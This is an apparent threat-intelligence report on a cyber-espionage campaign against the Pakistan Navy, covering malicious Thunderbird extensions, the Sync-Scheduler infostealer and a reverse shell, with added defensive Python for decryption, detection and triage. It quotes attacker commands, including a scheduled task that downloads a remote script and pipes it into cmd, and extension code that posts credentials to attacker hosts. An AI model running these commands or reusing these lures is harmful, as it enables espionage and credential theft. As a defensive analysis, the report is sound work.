Suspected Nation-State Adversary Targets Pakistan Navy in Cyber Espionage Campaign

Arctic Wolf has uncovered a sophisticated targeted attack perpetrated against the Pakistan Navy. The TTPs observed in this campaign point to a threat group with a relatively high degree of sophistication and a likely motive of espionage.

Summary

In early September, as part of the Arctic Wolf® Labs team’s continuous monitoring of cyber activities across the Indian subcontinent, we came across an interesting PDF lure which at a first glance appeared to be an internal IT communication for the Pakistan Navy.

As we pivoted off this artifact and followed its digital footprints, we came across a web of interlinking infrastructure, including artifacts of various filetypes that appeared to have an espionage theme and whose purpose was ultimately to deliver a stealthy infostealer to the targeted victims.

As we delved deeper into this campaign, we found that several of the Tactics, Techniques, and Procedures (TTPs) overlapped with those previously seen being used by two other prominent threat groups; however, we felt there was not enough evidence to warrant an attribution at this time.

In this blog, we’ll examine the full attack chain of this unknown threat actor, and provide actionable recommendations for remediation.

Technical Analysis

The initial lure in this campaign was a PDF document that was designed to look like an internal Pakistan Navy IT memo containing instructions on the integration of Axigen Thunderbird for secure email communications. This lure document contains an embedded URL used to obtain the required files, with targeted users being directed to download and install them.

At a first glance, the download link appears to conform to that of a legitimate Pakistan Navy URL, with the use of a secure protocol and “paknavy” domain name.

Figure 1: Pakistan Navy (fake) initial lure document.

However, the link actually points to an attacker-controlled lookalike host. Legitimate Pakistan Navy URLs follow the paknavy.gov.pk pattern, whereas this one is a subdomain named “paknavy” under the unrelated free web-hosting domain rf[.]gd. This is domain impersonation (a lookalike host name) rather than search engine optimization (SEO) poisoning: the victim reaches the page through the link in the lure, not through search results.

Legitimate URL | Fake URL
https://www.paknavy.gov.pk/ | hxxps://www[.]paknavy[.]rf[.]gd/

Table 1: Typosquatted “Paknavy” URL.

Upon inspecting the page at hxxps://paknavy[.]rf[.]gd, we found it contained code designed to verify that the visitor’s browser has JavaScript enabled before the user can proceed to the malicious Thunderbird extension packaged within the zip file (Axigen_Thunderbird.zip).

Table 2: Paknavy[.]rf[.]gd: JavaScript enabled on victim environment check.

This strongly suggests that the threat actor had prior knowledge of the Pakistan Navy’s use of Axigen mail servers together with Thunderbird as the email client.

As the next stage of the attack, the threat actor meticulously crafted a custom Axigen user manual for the installation of a malicious Thunderbird extension, specifically tailored for this campaign. This high level of dedication plus the time and resources the group put into crafting such a detailed document indicates a highly targeted modus operandi.

Figure 2: Fake user manual for a malicious Thunderbird extension.

Once an unwitting user follows the fake instruction manual and installs the malicious extension in their Thunderbird email client, the client displays the title “Mail Files Downloader.”

The extension then displays a login form designed specifically for @paknavy.gov.pk email addresses, misleading the victim into believing that upon entering their credentials they will be able to access and download their emails.

Figure 3: “Mail Files Downloader” extension installed in Thunderbird.

Once the user enters their legitimate credentials and submits them via the fake login form, they are sent in the body of an HTTP POST request to hxxps://updateschedulers[.]com/receive_credentials[.]php.

If the server responds with “Credentials Received,” the extension calls a downloadFile() function with a URL assembled as follows:

downloadFile(atob("aHR0cHM6Ly91cGRhdGVzY2hlZHVsZXJzLmNvbS9maWxlX2Rvd25sb2FkLnBocD9sZj0=") + ms);

Table 3: Successful POST returned code.

The embedded Base64 string decodes to hxxps://updateschedulers[.]com/file_download[.]php?lf=, and the variable “ms” is appended as the value of the lf parameter. “ms” is not the raw user-agent string itself but a short operating system (OS) tag derived from it: the getS() function below inspects navigator.userAgent and returns an abbreviation for whichever OS it detects, so a Windows victim, for example, requests file_download.php?lf=WIN.

  // Map navigator.userAgent to a short OS tag. Order matters: "windows phone"
  // is tested before "windows", and "android" before the generic "linux" match.
  function getS() {
    const userAgent = navigator.userAgent;
    if (/windows phone/i.test(userAgent)) { return "WP"; }
    if (/windows/i.test(userAgent)) { return "WIN"; }
    if (/macintosh|mac os x/i.test(userAgent)) { return "Mac"; }
    if (/android/i.test(userAgent)) { return "And"; }
    if (/linux/i.test(userAgent)) { return "LIN"; }
    if (/iphone|ipad|ipod/i.test(userAgent)) { return "iOS"; }
    return "Unknown";
  }
  const ms = getS();

Table 4: OS identification.

Depending on which OS is identified on the victim’s device, the threat actor’s command-and-control (C2) server will then respond by returning a correlating zip file titled Mail_Files.zip.

At the time of our investigation, while each operating system returned a corresponding zip file, only the Windows OS returned an actual payload intended for further exploitation. When queried from other OSes, a zip was returned that is best described as a dummy folder containing benign documents or files.

We have a couple of theories about this. It may be because the threat actor was only interested in targeting Windows devices, or that they intend to target other OSes in future. Alternatively, they may be just using this process as an OS check to verify their payload is sent to the correct machines for detonation.

Execution Chain

Figure 4: Execution chain diagram. (Click to enlarge.)

Final Payload: Sync-Scheduler

The final payload is a very stealthy and capable infostealer dubbed Sync-Scheduler by researchers at Cyfirma. It was first documented in March 2024, although we have found earlier samples that appear to be from at least mid-2023 based on their compilation timestamps.

The sample used in this particular campaign appears to be a newer version of the one previously documented by Cyfirma researchers earlier this year.

Authored in C++ and containing robust evasion and anti-analysis capabilities, Sync-Scheduler’s core functionality appears to have remained largely unchanged since previous iterations. Upon execution, the malware gathers basic machine metadata, notably the system’s universally unique identifier (UUID), by running the Windows Management Instrumentation (WMI) query SELECT * FROM Win32_ComputerSystemProduct and reading the UUID property (the SMBIOS system UUID) from the result.

Figure 5: UUID WMI query.

This information is then sent to the threat actor’s C2 server at packageupdates[.]net/r3diRecT/redirector/proxy[.]php via an HTTP POST request, as a check-in body of the form uD=<UUID>&xifangtaiyang= (the two parameter names that the Suricata rule at the end of this report keys on).

Figure 6: Initial C2 checkin at packageupdates[.]net.

This C2 server differs from the one used in previously documented Sync-Scheduler campaigns. Most notably, manually browsing to it redirects the visitor to a Chinese Government website, the same site that the older version of the infostealer redirected to.

Figure 7: Attempts to manually navigate to the C2 redirects the user to the legitimate site www.gov.cn.

One of the malware’s more notable anti-analysis features is that the commands it uses to establish persistence are stored as encrypted blobs and only decrypted in memory at runtime, so they are not visible to static string analysis.

Persistence is attained via the creation of several scheduled tasks, each deceptively named after common, legitimate Windows software: OneDrive, Skype and WindowsUpdate. The names are chosen so that the tasks look benign to an administrator scanning Task Scheduler. The three tasks are staggered across the working day, two and a half to three hours apart.

Full Command:

cmd.exe /c "schtasks /create /tn "OneDrive" /tr "cmd" /sc once /st 09:30 /f && schtasks /create /tn "Skype" /tr "cmd" /sc once /st 12:00 /f && schtasks /create /tn "WindowsUpdate" /tr "cmd" /sc once /st 15:00 /f"

Broken Down:

schtasks /create /tn "OneDrive" /tr "cmd" /sc once /st 09:30 /f

schtasks /create /tn "Skype" /tr "cmd" /sc once /st 12:00 /f

schtasks /create /tn "WindowsUpdate" /tr "cmd" /sc once /st 15:00 /f

Note that, as captured, each task’s action (/tr) is a bare cmd with no arguments and /sc once fires it a single time; the command lines themselves do not reveal what the launched cmd.exe is expected to do. Defenders should therefore key on the creation pattern (schtasks /create with a Microsoft product name as the task name and a command interpreter as the action) rather than on any particular payload.

Figure 8: Scheduled Task command line arguments.

Figure 9: Scheduled task creation.

The main purpose of Sync-Scheduler is to look for documents of specific common types, gather them in the same location and get them ready for exfiltration.

Buried deep within its code is a list of hardcoded strings corresponding with each document file-type. It uses this list to compare and replace each file-type extension with its correlating ID tag in the list shown below.

Document Type | ID Tag
.doc | X367
.docx | X946
.pdf | X567
.zip | X052
.xls | X142
.xlsx | X375
.ppt | X593
.pptx | X842

Table 5: Document type and correlating ID tag.

Figure 10: Targeted file-type replacement strings.

For each file found whose extension appears in this list, the malware copies it to C:\\Users\\<user>\\AppData\\Roaming\\System with the extension replaced by the corresponding tag (a .docx document, for example, carries the X946 tag in place of its extension). The renaming hides the file type from extension-based inspection, but it also leaves an easily hunted artifact: files ending in one of the Table 5 tags under AppData\\Roaming\\System.

The original file paths are logged to a file called Registry.log in a newly created directory at C:\\Users\\<user>\\AppData\\Roaming\\FileRegistry\\.

The staged files are then encrypted with the Tiny Encryption Algorithm (TEA) prior to exfiltration to packageupdates[.]net.
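
As an added illustration (this is example code written for this edit, not the malware’s code and not Arctic Wolf’s tooling), the following Python shows what an analyst recovering staged files needs: the Table 5 mapping reversed to restore original extensions, and a TEA implementation to decrypt staged contents. The report states only that TEA is used; the key, the mode (plain ECB over 8-byte blocks with little-endian words), PKCS#7 padding and the “tag after the last dot” naming are assumptions that would have to be confirmed against the sample.

```python
import struct
from typing import Dict, Tuple

# Extension -> tag table as documented in the report (Table 5).
TAG_FOR_EXT: Dict[str, str] = {
    ".doc": "X367", ".docx": "X946", ".pdf": "X567", ".zip": "X052",
    ".xls": "X142", ".xlsx": "X375", ".ppt": "X593", ".pptx": "X842",
}
EXT_FOR_TAG: Dict[str, str] = {tag: ext for ext, tag in TAG_FOR_EXT.items()}

DELTA = 0x9E3779B9   # TEA round constant
MASK = 0xFFFFFFFF
ROUNDS = 32


def stage_name(original: str) -> str:
    """Emulate the renaming described in the report: 'report.docx' -> 'report.X946'.
    Placing the tag after the last dot is an assumption. Other extensions are untouched."""
    stem, dot, ext = original.rpartition(".")
    if dot and ("." + ext) in TAG_FOR_EXT:
        return stem + "." + TAG_FOR_EXT["." + ext]
    return original


def restore_name(staged: str) -> str:
    """Reverse stage_name: 'report.X946' -> 'report.docx'."""
    stem, dot, suffix = staged.rpartition(".")
    if dot and suffix in EXT_FOR_TAG:
        return stem + EXT_FOR_TAG[suffix]
    return staged


def _tea_encrypt_block(v0: int, v1: int, k: Tuple[int, int, int, int]) -> Tuple[int, int]:
    s = 0
    for _ in range(ROUNDS):
        s = (s + DELTA) & MASK
        v0 = (v0 + ((((v1 << 4) + k[0]) & MASK) ^ ((v1 + s) & MASK) ^ (((v1 >> 5) + k[1]) & MASK))) & MASK
        v1 = (v1 + ((((v0 << 4) + k[2]) & MASK) ^ ((v0 + s) & MASK) ^ (((v0 >> 5) + k[3]) & MASK))) & MASK
    return v0, v1


def _tea_decrypt_block(v0: int, v1: int, k: Tuple[int, int, int, int]) -> Tuple[int, int]:
    s = (DELTA * ROUNDS) & MASK   # value of 'sum' after the 32 encryption rounds
    for _ in range(ROUNDS):
        v1 = (v1 - ((((v0 << 4) + k[2]) & MASK) ^ ((v0 + s) & MASK) ^ (((v0 >> 5) + k[3]) & MASK))) & MASK
        v0 = (v0 - ((((v1 << 4) + k[0]) & MASK) ^ ((v1 + s) & MASK) ^ (((v1 >> 5) + k[1]) & MASK))) & MASK
        s = (s - DELTA) & MASK
    return v0, v1


def _key_words(key: bytes) -> Tuple[int, int, int, int]:
    if len(key) != 16:
        raise ValueError("TEA uses a 128-bit key")
    return struct.unpack("<4I", key)   # little-endian word order is an assumption


def tea_ecb_encrypt(data: bytes, key: bytes) -> bytes:
    k = _key_words(key)
    pad = 8 - len(data) % 8            # PKCS#7 padding to a whole 8-byte block (assumption)
    data = data + bytes([pad]) * pad
    out = bytearray()
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack("<2I", data[i:i + 8])
        out += struct.pack("<2I", *_tea_encrypt_block(v0, v1, k))
    return bytes(out)


def tea_ecb_decrypt(data: bytes, key: bytes) -> bytes:
    if not data or len(data) % 8:
        raise ValueError("ciphertext must be a non-empty multiple of 8 bytes")
    k = _key_words(key)
    out = bytearray()
    for i in range(0, len(data), 8):
        v0, v1 = struct.unpack("<2I", data[i:i + 8])
        out += struct.pack("<2I", *_tea_decrypt_block(v0, v1, k))
    pad = out[-1]
    if not 1 <= pad <= 8 or out[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: wrong key, or the sample does not use ECB/PKCS#7")
    return bytes(out[:-pad])


def recover_staged_file(staged_name: str, blob: bytes, key: bytes) -> Tuple[str, bytes]:
    """Turn a staged (renamed, TEA-encrypted) file back into its original name and bytes."""
    return restore_name(staged_name), tea_ecb_decrypt(blob, key)


if __name__ == "__main__":
    demo_key = bytes(range(16))   # constructed key for the demo, not recovered from any sample
    body = b"Quarterly maintenance schedule (constructed sample content)"
    name, blob = stage_name("schedule.docx"), tea_ecb_encrypt(body, demo_key)
    print(name, len(blob), "bytes staged")
    print(recover_staged_file(name, blob, demo_key))
```

In practice the key and block layout would be lifted from the sample (the TEA constant 0x9E3779B9 is a convenient anchor when locating the routine in a disassembler); the padding check in tea_ecb_decrypt is what tells you quickly whether a candidate key is wrong.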

An Intriguing Relation

Interestingly, some pivoting revealed another file that contained an almost identical scheduled task creation command structure to the one mentioned above. The only difference between the two was the use of “daily” as opposed to “once.”

This file, named KBUpdate.exe, had a compilation timestamp of 2024-06-03 09:32:31 and was found embedded inside a table in the database of the Microsoft Access file Tax_List1.accde. This highly unusual execution chain ensured it slipped well under the radar of most vendors when uploaded to VirusTotal (VT) in early August.

It also contained a program database (PDB) path which was similar in structure and seemed to match the one seen in our Sync-Scheduler sample.

File Name | PDB Path | Malware Type
Employee-Information-Pak-Navy-2024.exe | C:\\Users\\user\\source\\repos\\MW-PAK-DataExt-Win\\x64\\Release\\MW-PAK-DataExt-Win.pdb | Sync-Scheduler InfoStealer
KBUpdate.exe | C:\\Users\\user\\source\\repos\\MW-BLACK-Shell\\x64\\Release\\MW-BLACK-Shell.pdb | Black-Shell Reverse Shell

Figure 11: PDB comparison between the two files.

Upon analysis, we found significant overlaps in code base between KBUpdate.exe and the latest version of Sync-Scheduler (Employee-Information-Pak-Navy-2024.exe) documented in this report. However, their core functionality and purpose are inherently different.

Figure 12: Code overlaps between Sync-Scheduler and Black-Shell.

The main difference that caught our attention was that KBUpdate.exe, which we are referring to as Black-Shell after the codename in its PDB path, is best described as a reverse shell: a lightweight backdoor in which the compromised victim device connects out to an attacker-controlled machine and hands it an interactive command shell.

Black-Shell shares part of its codebase with Sync-Scheduler’s Employee-Information-Pak-Navy-2024.exe, but it has no capability to find, encrypt or exfiltrate files; its functionality is limited to the reverse shell.

The Plot Thickens

In late August 2024, another Microsoft Access file with characteristics resembling Tax_List1.accde was uploaded to VT by a user based in Pakistan. This file executes a scheduled task command consistent with tactics associated with APT Bitter, a suspected South Asian cyber espionage group that has been active since at least 2013, and the C2 it contacts, mxmediasolutions[.]com, had been linked to the same group as early as July 2024. The task runs every 14 minutes: curl fetches whatever addc.php returns (the request is tagged with the victim’s computer and user names) into pic.jpg, and more pic.jpg | cmd pipes that downloaded text into cmd.exe as commands. The “image” is therefore a remotely served batch script, and the task is a polling backdoor rather than simple persistence.

cmd.exe /c schtasks /create /tn EdgeUpdateTaskMachine /f /sc minute /mo 14 /tr "conhost.exe --headless cmd /c curl -o C:\\Users\\public\\documents\\pic.jpg mxmediasolutions[.]com/addc.php?mg=%computername%_%username% & more C:\\Users\\public\\documents\\pic.jpg | cmd"

Table 6: Microsoft Access file scheduled task command linked to APT Bitter.
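
As an added example (written for this edit, not part of the original report), the following Python applies the two scheduled-task patterns described above, the OneDrive/Skype/WindowsUpdate tasks created by Sync-Scheduler and Black-Shell and the EdgeUpdateTaskMachine task linked to APT Bitter, to process-creation command lines of the kind found in Sysmon Event ID 1 or Windows Security 4688 records. The sample records are constructed from the commands quoted in this report plus one benign control; the masquerade name list and the “interpreter as task action” heuristic are the example author’s choices, not a vendor signature.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Task names the campaign borrowed from real Microsoft software (from this report).
MASQUERADE_NAMES = {"onedrive", "skype", "windowsupdate", "edgeupdatetaskmachine"}

# A task carrying one of those names should launch the product binary, not a shell.
INTERPRETER_ACTION = re.compile(
    r"^(?:cmd|conhost|powershell|pwsh|wscript|cscript|mshta)(?:\.exe)?\b", re.I)

# Download-then-execute chains: a fetch tool or 'more' feeding cmd through a pipe.
DOWNLOAD_EXEC = re.compile(r"\b(?:curl|certutil|bitsadmin|wget|more)\b[^|]*\|\s*cmd\b", re.I)

TN = re.compile(r'/tn\s+(?:"([^"]*)"|(\S+))', re.I)
TR = re.compile(r'/tr\s+(?:"([^"]*)"|(\S+))', re.I)
SC = re.compile(r"/sc\s+(\w+)", re.I)
MO = re.compile(r"/mo\s+(\d+)", re.I)


def _value(m: Optional["re.Match[str]"]) -> str:
    """First captured group of a quoted-or-bare argument match, or '' if no match."""
    if not m:
        return ""
    return m.group(1) if m.group(1) is not None else m.group(2)


@dataclass
class Finding:
    task_name: str
    action: str
    schedule: str
    reasons: List[str] = field(default_factory=list)


def inspect_cmdline(cmdline: str) -> List[Finding]:
    """Return one Finding per suspicious 'schtasks /create' in a command line.
    A single line may chain several creations with '&&', as Sync-Scheduler does."""
    findings: List[Finding] = []
    for seg in re.split(r"\s*&&\s*", cmdline):
        if not re.search(r"\bschtasks(?:\.exe)?\b.*?/create\b", seg, re.I):
            continue
        name = _value(TN.search(seg))
        action = _value(TR.search(seg)).strip()
        schedule = _value(SC.search(seg)).lower() or "?"
        mo = MO.search(seg)
        if mo:
            schedule += f"/{mo.group(1)}"
        reasons = []
        if name.lower() in MASQUERADE_NAMES and INTERPRETER_ACTION.match(action):
            reasons.append("task named after Microsoft software but its action is a command interpreter")
        if DOWNLOAD_EXEC.search(action):
            reasons.append("action downloads content and pipes it into cmd")
        if reasons:
            findings.append(Finding(name, action, schedule, reasons))
    return findings


def scan(lines: List[str]) -> List[Finding]:
    return [f for line in lines for f in inspect_cmdline(line)]


# Constructed process-creation records: the first two reproduce the command lines quoted
# in this report (domain kept defanged), the third is a benign OneDrive registration.
SAMPLE_LOGS = [
    r'cmd.exe /c "schtasks /create /tn "OneDrive" /tr "cmd" /sc once /st 09:30 /f && '
    r'schtasks /create /tn "Skype" /tr "cmd" /sc once /st 12:00 /f && '
    r'schtasks /create /tn "WindowsUpdate" /tr "cmd" /sc once /st 15:00 /f"',
    r'cmd.exe /c schtasks /create /tn EdgeUpdateTaskMachine /f /sc minute /mo 14 '
    r'/tr "conhost.exe --headless cmd /c curl -o C:\Users\public\documents\pic.jpg '
    r'mxmediasolutions[.]com/addc.php?mg=%computername%_%username% '
    r'& more C:\Users\public\documents\pic.jpg | cmd"',
    r'schtasks /create /tn "OneDrive Standalone Update Task" '
    r'/tr "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe" '
    r'/sc daily /st 03:00',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f"[{f.schedule}] {f.task_name!r} -> {f.action[:60]!r}: {'; '.join(f.reasons)}")
```

Because the detection keys on the creation command rather than on the task payload, it still fires when the actor swaps the 09:30/12:00/15:00 schedule for /sc daily, as seen in the Black-Shell variant, or changes the downloaded script behind addc.php.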

Additional Finds

Retroactive hunts for similar malicious XPI files led to the discovery of four extension files targeting the Pakistan Navy, all of which masqueraded as an email-signing extension called “PN Mailbox E-signer,” which also targeted the Thunderbird email client. Notably, the “E-signer” extension files pre-date the Axigen_Thunderbird.xpi extension, with the last modifications recorded in late May 2024. All four files were distributed within a short period in early June 2024.

Figure 13: Additional Thunderbird extension files masquerading as “PN Mailbox E-signer” targeting the Pakistan Navy.

The “E-signer” extensions contained obfuscated JavaScript, and, once installed in Thunderbird, would prompt the user to input their password with the message: “Regular E-Signing will keep new mails updated.” Interestingly, the prompt did not request a username or email, but instead used a hardcoded Pakistan Navy email address embedded in the JavaScript in Base64 format.

These files did not deliver any additional payload. The primary purpose of the JavaScript across all extensions was to capture the intended victim’s password and send it via a POST request to hxxps://extension[.]webmailmigration[.]com/ajaxtension[.]php. The use of the Pakistan Navy logo, the specific naming of the extensions, and — most notably — the hardcoded email address, indicate that this group of files was highly targeted.
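
Both the “Mail Files Downloader” extension described earlier and the “E-signer” extensions share the same triage-relevant traits: a Thunderbird extension package (.xpi, which is a zip archive) whose JavaScript hides a C2 URL or a target address behind Base64. As an added example (written for this edit, not part of the report and not Arctic Wolf’s tooling), the Python below performs that static triage offline: it reads manifest.json, scans every script for Base64 literals that decode to printable text, and collects URLs and email addresses from both the raw and the decoded text. The sample package it builds is a constructed look-alike, not the real file; the only literal taken from the report is the Base64 string quoted in Table 3, and nothing is ever sent over the network.

```python
import base64
import binascii
import io
import json
import re
import zipfile
from typing import Dict, List

B64_LITERAL = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL = re.compile(r"https?://[^\s'\"<>()]+")
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")


def _decode_printable(token: str) -> str:
    """Decoded text if token is valid Base64 for printable ASCII, otherwise ''."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return ""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return ""
    return text if text.isprintable() else ""


def triage_xpi(xpi: bytes) -> Dict[str, object]:
    """Static triage of a Thunderbird/Firefox extension package held in memory."""
    report: Dict[str, object] = {"name": None, "permissions": [], "scripts": [],
                                 "decoded": [], "urls": [], "emails": []}
    with zipfile.ZipFile(io.BytesIO(xpi)) as zf:
        names = zf.namelist()
        if "manifest.json" in names:
            manifest = json.loads(zf.read("manifest.json"))
            report["name"] = manifest.get("name")
            report["permissions"] = list(manifest.get("permissions", []))
        for n in names:
            if not n.lower().endswith(".js"):
                continue
            src = zf.read(n).decode("utf-8", errors="replace")
            report["scripts"].append(n)
            decoded = [d for d in (_decode_printable(t) for t in B64_LITERAL.findall(src)) if d]
            report["decoded"].extend(decoded)
            haystack = src + "\n" + "\n".join(decoded)   # search raw and decoded text alike
            report["urls"].extend(URL.findall(haystack))
            report["emails"].extend(EMAIL.findall(haystack))
    for key in ("decoded", "urls", "emails"):
        report[key] = sorted(set(report[key]))
    return report


def build_sample_xpi() -> bytes:
    """Constructed look-alike of the extensions described in the report (NOT the real files).
    The URL literal is the Base64 string quoted in Table 3; the email is encoded here
    to mirror the hardcoded-address finding in the E-signer extensions."""
    email_b64 = base64.b64encode(b"ilsc-313@paknavy.gov.pk").decode()
    popup_js = (
        'const ms = getS();\n'
        'fetch("https://updateschedulers.com/receive_credentials.php", {method: "POST", body: form});\n'
        'downloadFile(atob("aHR0cHM6Ly91cGRhdGVzY2hlZHVsZXJzLmNvbS9maWxlX2Rvd25sb2FkLnBocD9sZj0=") + ms);\n'
        f'const who = atob("{email_b64}");\n'
    )
    manifest = {"manifest_version": 2, "name": "Mail Files Downloader", "version": "1.0",
                "permissions": ["accountsRead", "messagesRead"],
                "browser_action": {"default_popup": "popup.html"}}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("manifest.json", json.dumps(manifest))
        zf.writestr("popup.js", popup_js)
        zf.writestr("popup.html", "<script src='popup.js'></script>")
    return buf.getvalue()


if __name__ == "__main__":
    # For a real file: triage_xpi(open("suspect.xpi", "rb").read())
    print(json.dumps(triage_xpi(build_sample_xpi()), indent=2))
```

The decoded list is where the value lies: a login popup that needs accountsRead and messagesRead permissions and also carries a Base64-hidden external URL, or a Base64-hidden address belonging to a single user, is exactly the profile of the extensions in this campaign.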

SHA-256 | Name | First Seen | Hardcoded PakNavy Email
9b318a99a95ae21a846d2997ac103ff9de07bcd60b3e7c2d391b4a227642f8fb | ilsc-313.zip | 2024-06-04 05:47:24 | ilsc-313[at]paknavy.gov.pk
da9e4327bba989fc73280f3eee21cec9d13c1dc57a0df369ee95238c20846558 | pnlo-kamra.zip | 2024-06-05 05:08:35 | pnlo-kamra[at]paknavy.gov.pk
3291fa800968f2becf4aedd2ca683b83274d4b863112dab406b1465faf904a3b | E-Sign.xpi | 2024-06-07 09:49:50 | adpn37[at]paknavy.gov.pk
b8405d8d3447ea30ae49d147926faf3709d604b2ea25e92b63b3dc42eb724214 | Add-on.zip | 2024-06-12 16:40:27 | cicp_gsd[at]paknavy.gov.pk


Figure 14: Activity timeline of this campaign. (Click to enlarge.)

Some additional and older but nonetheless interesting artifacts were found when we were tracing back through the network infrastructure of the C2 servers updateschedulers[.]com and packageupdates[.]net.

We observed that in and around March 2024, a series of files was uploaded to VirusTotal that formed part of an execution chain not too dissimilar from the one documented in this report. This chain, which started with a Pakistan-targeted lure, is notable because it is the first time Arctic Wolf® saw both updateschedulers[.]com and packageupdates[.]net leveraged in a malicious campaign, and we believe it highly likely that they were being used by the same threat actor.

Another interesting thing we found is that one of the files in this particular execution chain was tagged by various sources online as being a WhisperGate sample, which was a highly destructive malware wiper deployed against Ukrainian targets in January 2022.

Upon further analysis, we can confirm this suspicion is false, and that the sample in question is in fact a simple downloader that leverages curl to retrieve the next file in the execution chain, which we identified as a version of Sync-Scheduler with an embedded PDB of C:\\Users\\user\\Documents\\Project-M\\Visual Studio\\MW-NEW_TELEMETRY-ExE\\x64\\Release\\MW-NEW_TELEMETRY-ExE.pdb.

Figure 15: ‘Benevolent Fund and Group Insurance’ lure document.

Network

Figure 16: Graph of network infrastructure. (Click to enlarge.)

IP Address | AS Name – ASN
185[.]27[.]134[.]139 | Wildcard UK Limited – 34119
185[.]227[.]82[.]38 | Access2.IT Group B.V – 208258
146[.]70[.]149[.]223 | M247 Europe SRL – 9009
146[.]70[.]149[.]216 | M247 Europe SRL – 9009
185[.]227[.]82[.]65 | Access2.IT Group B.V – 208258
146[.]70[.]80[.]58 | M247 Europe SRL – 9009

Table 7: IP address details corresponding with this campaign.

Malicious Domain | First Created | Last Updated | Last Seen IP | Registrar
paknavy[.]rf[.]gd | 2013-08-25 | 2024-09-06 | 31[.]22[.]4[.]234 | NameSilo, LLC
updateschedulers[.]com | 2023-08-01 | 2024-10-19 | 185[.]227[.]82[.]37 | NameSilo, LLC
packageupdates[.]net | 2023-12-12 | 2024-02-11 | 146[.]70[.]149[.]216 | PDR Ltd
finance-gov-pk[.]rf[.]gd | 2013-08-25 | 2024-09-06 | 199[.]59[.]243[.]227 | Key Systems Gmbh
extension.webmailmigration[.]com | 2024-03-28 | 2024-03-28 | 84[.]234[.]96[.]91 | GMO INTERNET, INC

Table 8: Malicious domain details. The two rf[.]gd entries are attacker-created subdomains of a free web-hosting domain, so their 2013 creation date is that of the parent rf[.]gd domain rather than of the actor’s own infrastructure.

Targets

Figure 17: Victim geolocation for this campaign.  

Attribution

With attribution, digging deeper frequently reveals a different picture from the original assumption, which makes accurate attribution a complex endeavor. Attackers commonly mask their location and identity and plant “false flags” that mimic the TTPs of other known groups in order to muddy the waters and mislead investigators.

Where attribution is concerned for this latest campaign observed by Arctic Wolf, here’s what we know to date: the targeted victim, along with the TTPs observed and documented in this attack, point to a threat actor that possesses a relatively high degree of sophistication, capabilities and knowledge, with a likely motive of conducting espionage.

In addition, several of the TTPs we observed have distinct overlaps with a previously documented campaign conducted against Chinese-based entities by the group known as SideWinder — an Indian state-aligned threat actor that has conducted espionage operations against Pakistani Government entities in the past.

On the other hand, Arctic Wolf observed many elements in this campaign that appear to align with prior operations attributed to APT Bitter — a South Asian threat group whose primary focus has been on conducting espionage operations against organizations and entities in South Asia, including China, Pakistan and Bangladesh, amongst others. Although APT Bitter has also been previously suspected to be Indian state-aligned, this has never been definitively confirmed or proven. Observed elements apparently shared between the groups included overlapping network infrastructure, specific URL formatting, access vectors, and other TTPs.

Despite these overlaps and indications for both groups, at the time of writing we do not feel there is a strong enough body of evidence to warrant a positive attribution to either of them, and will therefore consider this campaign as being perpetrated by an unknown group or nexus. However, as we continue our monitoring of threat actors in this particular geographic region, we will revisit our findings if more supporting evidence surfaces.

Conclusions

This investigation by the Arctic Wolf Labs team uncovered a sophisticated targeted attack perpetrated against the Pakistan Navy up until at least September 2024. Pivoting off the indicators of compromise (IOCs) revealed links to earlier campaigns going back as far as mid-2023, and highlights the ever-increasing complexity and persistence of modern cyberthreats targeting the Government and Defense sectors.

By following a strategic and highly considered approach, the threat actor employed advanced techniques, reconnaissance, and stealthy tooling to harvest credentials and exfiltrate sensitive information from its targets, which strongly indicates this unknown group’s probable interest in espionage and maritime intelligence.

Mitigation Recommendations

Conduct Regular User Awareness Training

The building, conducting and regular updating of an internal user awareness training program is one of the most cost-effective means of protecting your organization against cyber risks of all types. By continuously educating personnel and keeping them abreast of the latest developments in cyber threats, organizations of all sizes can build an excellent first line of defense to counter cyberattacks. Regular training empowers team members with the confidence and knowledge to protect both themselves and the organization they represent.

Phishing Protection

Protection of the outermost layers of a business is essential when it comes to shielding your organization from phishing and social engineering attacks, as threat actors often rely on humans being the weakest links of the security chain. Therefore, a modern email security solution (ESS) or web filtering solution combined with user awareness training can go a long way in mitigating against this attack vector.

Endpoint Protection Solutions

Deploying an advanced AI-powered endpoint protection platform (EPP) such as Arctic Wolf® Aurora™ Endpoint Security can help protect against the threats described in this report.

Restrict JavaScript in the Browser

Through strict group policies, IT admins can preconfigure browser settings on managed devices to disable JavaScript on sensitive machines and networks. This blunts execution chains that depend on browser-side JavaScript, such as the staging page used in this campaign. Note, however, that the credential-harvesting JavaScript here ran inside a Thunderbird extension that the user installed, which browser policy does not govern. Thunderbird supports the same enterprise policy mechanism as Firefox (policies.json), and its ExtensionSettings policy can block installation of all add-ons except an approved allowlist; that control, rather than a browser setting, is what would have stopped both the “Mail Files Downloader” and the “PN Mailbox E-signer” extensions from being installed.

Cyber Threat Intelligence

Having access to accurate and up-to-date cyber threat intelligence (CTI) is a critical component in building and maintaining an effective cyber defensive posture. This will enable an organization to proactively identify and mitigate potential threats before they escalate into fully blown cyberattacks. Threat intelligence delivers actionable insights into the latest TTPs being utilized by threat actors, enabling defenders to anticipate and build countermeasures against the newest attack methods.

Indicators of Compromise (IOCs)

File

SHA-256 | File name(s)
da9e4327bba989fc73280f3eee21cec9d13c1dc57a0df369ee95238c20846558 | pnlo-kamra.zip
9b318a99a95ae21a846d2997ac103ff9de07bcd60b3e7c2d391b4a227642f8fb | ilsc-313.zip
b8405d8d3447ea30ae49d147926faf3709d604b2ea25e92b63b3dc42eb724214 | Add-on.zip
3291fa800968f2becf4aedd2ca683b83274d4b863112dab406b1465faf904a3b | E-Sign.xpi
43979c3e6ff055d7743c3bd53529b6e4359dcaa257e8b79db60bd629a4fff856 | E-Sign.xpi
8fced2552e5b217bfc6d93a3c4d1cd7ac0c51a42180dbe0f56af2e6368637fb1 | E-Sign.xpi.ilsc-313
